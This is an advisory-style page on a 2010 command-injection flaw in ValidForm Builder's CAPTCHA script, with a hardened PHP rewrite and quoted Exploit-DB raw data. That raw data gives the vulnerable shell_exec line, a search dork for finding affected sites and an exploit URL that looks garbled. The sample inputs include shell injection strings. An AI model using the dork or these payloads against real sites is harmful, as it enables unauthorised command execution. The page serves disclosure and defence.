Vendor: ValidForm Builder
By: HackeR aRaR
CVSS: 9.3 (HIGH)
Type: Remote Command Execution
CWE: 78
Product Name: ValidForm Builder
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: //a:validformbuilder:validformbuilder:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
Year: 2010

ValidForm Builder script Remote Command Execution

A vulnerability in the ValidForm Builder script allows an attacker to execute arbitrary commands on the vulnerable system. It is caused by insufficient sanitization of user-supplied input passed to the 'shell_exec' call in the 'class.phpcaptcha.php' file. An attacker can exploit it by sending a malicious HTTP request to the vulnerable script.

Mitigation:

Upgrade to the latest version of ValidForm Builder script.
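
A hardened way to build the flite command that the shell_exec call quoted in the raw data below assembles by string interpolation, shown as an added example (not ValidForm Builder's code or its patch). The function name, parameter names, allowlist patterns and sample paths are assumptions.

```php
<?php
// Added example: hypothetical helper, not part of ValidForm Builder.
// Builds the "flite -t <text> -o <file>.wav" command without letting
// request data reach the shell unquoted.

function buildFliteCommand(string $flitePath, string $audioDir, string $file, string $text): string
{
    // Primary control: allowlist. The output name is a short alphanumeric token,
    // so it cannot carry path separators or shell metacharacters.
    if (!preg_match('/\A[A-Za-z0-9]{1,32}\z/', $file)) {
        throw new InvalidArgumentException('invalid audio file token');
    }
    // CAPTCHA text is assumed to be a short run of letters, digits and spaces.
    if (!preg_match('/\A[A-Za-z0-9 ]{1,16}\z/', $text)) {
        throw new InvalidArgumentException('invalid captcha text');
    }

    $out = rtrim($audioDir, '/\\') . DIRECTORY_SEPARATOR . $file . '.wav';

    // Defense in depth: escapeshellarg() quotes each value as a single argument,
    // replacing the hand-written \"...\" quoting of the original call.
    return escapeshellarg($flitePath)
        . ' -t ' . escapeshellarg($text)
        . ' -o ' . escapeshellarg($out);
}

// Constructed sample inputs: one well-formed value, two carrying shell metacharacters.
$samples = ['k7Qp2', 'abc"; id; "', '$(id)'];

foreach ($samples as $text) {
    try {
        // The command string is only printed here; a caller would pass it to shell_exec().
        echo buildFliteCommand('/usr/bin/flite', '/var/tmp/captcha', 'a1b2c3', $text), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', json_encode($text), "\n";
    }
}
```

Values that fail the allowlist are rejected before any command string exists, so quoting is never the only barrier between request data and the shell.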

Exploit-DB raw data:

# Exploit Title:   ValidForm Builder script Remote Command Execution Vulnerability
# Date: 2010/07/23
# Author: HackeR aRaR
# Email: y.0@hotmail.de
# My Sites : www.vbspiders.com
# Script home: http://www.phpgalleryscript.org
# download Script: http://validformbuilder.googlecode.com/files/validformbuilder_v.1.0.zip
# Tested on: Windows
# Team hacker:HaCkEr aRaR & ViRuS Qalaa >>>X-MaN HaCk3r TeaM
#ViRuS Qalaa:em9@live.com
:::::::::::::::::::::::::
=================Exploit=================

-=[ vuln c0de ]=-
shell_exec("$this->sFlitePath -t \"$sText\" -o $this->sAudioPath$sFile.wav");
/libraries/ValidForm/class.phpcaptcha.php
Line:466

----exploit----
Dork: "PHP Gallery © 2010 PHP Weby hostgator coupon"

http://{localhost}/{path}/libraries/ValidForm/class.phpcaptcha.php?this=id

---------greatz----------
Greatz to :
ViRuS Qalaa,VoLc4n0

and My friends Others and My friends in MSN
EnJoY o_O